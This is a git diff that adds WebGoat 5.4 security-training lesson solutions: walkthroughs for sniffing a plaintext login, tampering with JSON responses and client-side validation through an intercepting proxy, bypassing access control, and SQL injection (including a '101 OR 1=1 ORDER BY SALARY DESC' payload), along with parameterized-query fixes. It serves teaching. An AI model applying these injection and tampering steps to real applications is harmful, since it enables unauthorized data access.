diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg
new file mode 100644
index 000000000..5c309829a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg
new file mode 100644
index 000000000..296995e6d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg
new file mode 100644
index 000000000..04b19c12d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg
new file mode 100644
index 000000000..1e20add5b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg
new file mode 100644
index 000000000..cc30af047
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg
new file mode 100644
index 000000000..0e01db1ea
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg
new file mode 100644
index 000000000..51964a9bb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg
new file mode 100644
index 000000000..9f8efcbb7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg
new file mode 100644
index 000000000..036e50e47
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg
new file mode 100644
index 000000000..81b54f365
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg
new file mode 100644
index 000000000..caf41923a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg
new file mode 100644
index 000000000..cd100cf63
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg
new file mode 100644
index 000000000..9a48ce5a4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/InsecureLogin.html b/webgoat-5.4/src/main/webapp/lesson_solutions/InsecureLogin.html
new file mode 100644
index 000000000..c9abe281d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/InsecureLogin.html
@@ -0,0 +1,61 @@
+
+
+
+Insecure Login
+Lesson Plan Title: Insecure Login
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: This lesson has two stages. In the first stage you try to sniff a password
+which is sent in plaintext. In the second stage you try the same
+but on a secure connection.
+You need a client server setup for this lesson. Please refer
+to the Tomcat Setup in the Introduction section.
+
+Stage 1
+Start a sniffer. If you do not have one we recommend wireshark, which
+is free: Wireshark . Make sure
+you are capturing on the right interface. Click on
+the submit button ans stop the capturing. Now analyze the captured data.
+
+
+
Figure 1: Sniffed Traffic
+
As you can see we are interested in the HTTP Post request as
+the password is transmitted there. The field for the password has
+the name clear_pass and has as value sniffy. Of course
+this is also the correct answer and you are done with stage 1.
+
+Stage 2
+
+Now you have to switch to a secure connection. You archive this
+by changing the URL from http://... to https://... Sniff again the traffic
+as you have done in stage 1. As you will see there is not sent the password
+in plaintext. The server communicates with the application over a secure layer
+the so called Transport Layer Security (TLS) also called Secure Socket Layer (SSL).
+TLS is a hybrid encrypting protocol. A master secret is built to communicate.
+This master secret is built by using SHA-1 and MD5. All traffic between
+the Server and the Cleint is encrypted.
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png b/webgoat-5.4/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png
new file mode 100644
index 000000000..135fc3606
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection.html
new file mode 100644
index 000000000..a78a84d25
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection.html
@@ -0,0 +1,806 @@
+
+
+
+Solution: JSON Injection
+
+
+
Lesson
+Plan Title: How to
+Perform JSON Injection
+
+
+
+
Concept /
+Topic To Teach:
+
+
This lesson
+teaches how to perform JSON Injection Attacks.
+
+
+
+
How the
+attacks works:
+
+
JavaScript Object
+Notation (JSON) is a simple and effective lightweight data exchange format.
+JSON can be in a lot of forms such as arrays, lists, hashtables and other data
+structures. JSON is widely used in AJAX and Web2.0 application and is favored
+by programmers over XML because of its ease of use and speed. However, JSON,
+like XML is prone to Injection attacks. A malicious attacker can inject the
+reply from the server and inject some arbitrary values in there.
+
+
+
+
General
+Goal(s):
+
+
You
+are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code
+SEA.
+
+
+
+
+
+
Figure 1 AJAX Security - JSON Injection
+
+
+
+
Solution:
+
+
Like with the previous lessons you need to manipulate the HTTP Response
+using WebScarab.
+
+
+
+
Examine the normal flow by entering the airport code BOS and SEA and
+intercept the HTTP Request and the HTTP Response in WebScarab.
+
+
+
+
+
+
Figure 2 Intercept HTTP Request
+
+
+
+
+
+
Figure 3 Intercept HTTP Response
+
+
+
+
Change the
+price for the expensive flight of $600 to $100 and click "Accept changes".
+
+
+
+
+
+
+
+
Figure 4 Updated price
+
+
+
+
+
+
Figure 5 Injected result
+
+
+
+
Select the flight
+with no stops and the updated price and click "Submit".
+
+
+
+
+
+
Figure 6 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png
new file mode 100644
index 000000000..cfdb7b042
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png
new file mode 100644
index 000000000..217f69bd7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png
new file mode 100644
index 000000000..affeaa193
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png
new file mode 100644
index 000000000..709f70b6a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png
new file mode 100644
index 000000000..b7d120e45
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png
new file mode 100644
index 000000000..3d93d05e5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg
new file mode 100644
index 000000000..21504eb14
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg
new file mode 100644
index 000000000..cf6cc7471
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg
new file mode 100644
index 000000000..ccd96c071
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg
new file mode 100644
index 000000000..3710a91c1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg
new file mode 100644
index 000000000..fecffb54d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg
new file mode 100644
index 000000000..f4edbeeb7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation.html b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation.html
new file mode 100644
index 000000000..b46f2e402
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation.html
@@ -0,0 +1,841 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Bypass Client Side JavaScript Validation
+
+
+
+
Concept /
+Topic To Teach:
+
+
Client-side validation
+should not be considered a secure means of validating parameters. This
+validation only helps reducing the amount of server processing time for normal
+users who do not know the format of required input. Attackers can bypass these
+mechanisms easily in various ways. Any client-side validation should be
+duplicated on the server side. This will greatly reduce the likelihood of
+insecure parameter values being used in the application.
+
+
+
+
General
+Goal(s):
+
+
For this
+exercise, the web site requires that you follow certain rules when you fill out
+a form. The user should be able to break those rules, and send the website
+input that it wasn't expecting.
+
+
+
+
+
+
Figure 1 Lesson 6
+
+
+
+
There are two
+ways to complete this lesson. The first one is to submit a valid request like
+the one from the screenshot above and intercept this using WebScarab. The
+second way is to intercept the HTTP Response when loading the page and remove
+the Javascript that validates the values.
+
+
+
+
Solution 1
+
+
+
+
+
+
Figure 2 Intercept request
+
+
+
+
Add different
+symbols to the fields and click "Accept changes".
+
+
+
+
+
+
Figure 3 Change parameters
+
+
+
+
+
+
Figure 4 Lesson 6 Completed
+
+
+
+
Solution 2
+
+
+
+
Reload the
+page by clicking on the menu item "How to bypass Client-Side Javascript
+Validation" and intercept the response in WebScarab.
+
+
+
+
+
+
Figure 5 Enable "Intercept responses"
+
+
+
+
+
+
Figure 6 Intercepted response
+
+
+
+
If you remove
+the onclick="validate();" the "Submit" button will not work anymore.
+
+
Locate the
+validate() Javascript function in the HTML page.
+
+
+
+
+
+
Figure 7 The function validate()
+
+
+
+
Removing the regular
+expressions will remove the Javascript validation and submit the form.
+
+
+
+
+
+
Figure 8 Changed validate() function
+
+
+
+
Click "Accept
+changes". This returns a HTML page like before but without any regular
+expression checks.
+
+
+
+
+
+
Figure 9 It looks the same
+
+
+
+
Change the
+fields in the HTML page to contain symbols like @#@@# and click "Submit".
+
+
+
+
+
+
Figure 10 No more regular expression checks
+
+
+
+
+
+
Figure 11 Lesson 6 Completed
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png
new file mode 100644
index 000000000..bb24a6c8f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg
new file mode 100644
index 000000000..ac600b733
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png
new file mode 100644
index 000000000..20f3f3871
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg
new file mode 100644
index 000000000..0ffa3bfe7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png
new file mode 100644
index 000000000..a189bb3d8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg
new file mode 100644
index 000000000..2e361f07f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png
new file mode 100644
index 000000000..2e74b5ec7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg
new file mode 100644
index 000000000..34cf88ebb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif
new file mode 100644
index 000000000..1779f251e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png
new file mode 100644
index 000000000..88661381a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg
new file mode 100644
index 000000000..ab68d0731
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png
new file mode 100644
index 000000000..4d3ab3e2f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg
new file mode 100644
index 000000000..3ba19dd7e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png
new file mode 100644
index 000000000..90ea086b2
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg
new file mode 100644
index 000000000..47033c76c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png
new file mode 100644
index 000000000..36393c423
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg
new file mode 100644
index 000000000..02087fd18
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png
new file mode 100644
index 000000000..6fa005b7c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg
new file mode 100644
index 000000000..fa77e0a36
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png
new file mode 100644
index 000000000..43737e5d1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg
new file mode 100644
index 000000000..9cde03d4b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png
new file mode 100644
index 000000000..24ef81f2b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg
new file mode 100644
index 000000000..8fbe215fd
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html
new file mode 100644
index 000000000..18aa18be9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html
@@ -0,0 +1,50 @@
+
+
+
+Solution Lab Role Based Access Control Stage2
+Lesson Plan Title: Role Based Access Control: Stage 2
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+
+Solution:
+
+//***************CODE HERE*************************
+if(!isAuthorized(s, getUserId(s), requestedActionName))
+{
+ throw new UnauthorizedException();
+}
+//*************************************************
+Solution Lab Role Based Access Control Stage4
+Lesson Plan Title: Role Based Access Control: Stage 4
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+
+Solution:
+
+//***************CODE HERE*************************
+if(!isAuthorized(s, getUserId(s), requestedActionName))
+{
+ throw new UnauthorizedException();
+}
+if(!action.isAuthorizedForEmployee(s, getUserId(s), s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0)))
+{
+ throw new UnauthorizedException();
+}
+//*************************************************
+Solution Lab Role Based Access Control Stage1
+Lesson Plan Title: Role Based Access Control: Stage 1
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+
+Solution:
+Solution Lab Role Based Access Control Stage3
+Lesson Plan Title: Role Based Access Control: Stage 3
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+
+Solution:
+
+Log in as Tom with tom as password. Click on Tom's name in the list and make sure
+webscarab will intercept the next request. Change the employee_id for example to 101.
+Solution Lab SQL Injection Stage3
+Lesson Plan Title: How to Perform a SQLInjection
+
+Concept / Topic To Teach:
+
+Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.
+
+It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+
+
+General Goal(s):
+
+Solution:
With '101 OR 1=1' we have a SQL Statement which is always true. It will
+get all the employees from the db but only return one of them. That is why we have to ensure we get
+the "Big Fish" which is the employee earning most. With 'ORDER BY SALARY DESC' we guarantee exactly this.
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab SQL Injection/Lab Parameterized Query #1.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab SQL Injection/Lab Parameterized Query #1.html
new file mode 100644
index 000000000..e09478565
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab SQL Injection/Lab Parameterized Query #1.html
@@ -0,0 +1,87 @@
+
+
+
+Solution Lab SQL Injection Stage2
+Lesson Plan Title: How to Perform a SQLInjection
+
+Concept / Topic To Teach:
+
+Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.
+
+It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+
+
+General Goal(s):
+
+Solution:
+String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
+// System.out.println("Query:" + query);
+try
+{
+ Statement answer_statement = WebSession.getConnection(s)
+ .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+ ResultSet answer_results = answer_statement.executeQuery(query);
+ etc...
+
+To paramerize the Query you have to replace the userinput with questionmarks:String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
+
+Now follows the try block with the getConnection method:
+try
+
+The next step is to do a so called "PrepareStatement":PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+
+
+Now that the query is prepared we have to add the parameters to the query:
+statement.setString(1, userId);
+
+
+We are ready to execute the query!
+ResultSet answer_results = statement.executeQuery();
+
+Putting everything together results in:
+String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
+try
+{
+ Connection connection = WebSession.getConnections(s);
+ PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+ statement.setString(1, userId);
+ statement.setString(2, password);
+ ResultSet answer_results = statement.executeQuery();
+ etc...
+Solution Lab SQL Injection Stage4
+Lesson Plan Title: How to Perform a SQLInjection
+
+Concept / Topic To Teach:
+
+Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.
+
+It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+
+
+General Goal(s):
+
+Solution:
+String query = "SELECT employee.* "
+ + "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
+ + "ownership.employer_id = ? and ownership.employee_id = ?";
+try
+{
+ Connection connection = WebSession.getConnections(s);
+ PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+ statement.setString(1, userId);
+ statement.setString(2, subjectUserId);
+ ResultSet answer_results = statement.executeQuery();
+ etc...
+Solution Lab SQL Injection Stage1
+Lesson Plan Title: How to Perform a SQLInjection
+
+Concept / Topic To Teach:
+
+Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.
+
+It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+
+
+General Goal(s):
+
+Solution:
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Reflected XSS.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Reflected XSS.html
new file mode 100644
index 000000000..28a31d1eb
--- /dev/null
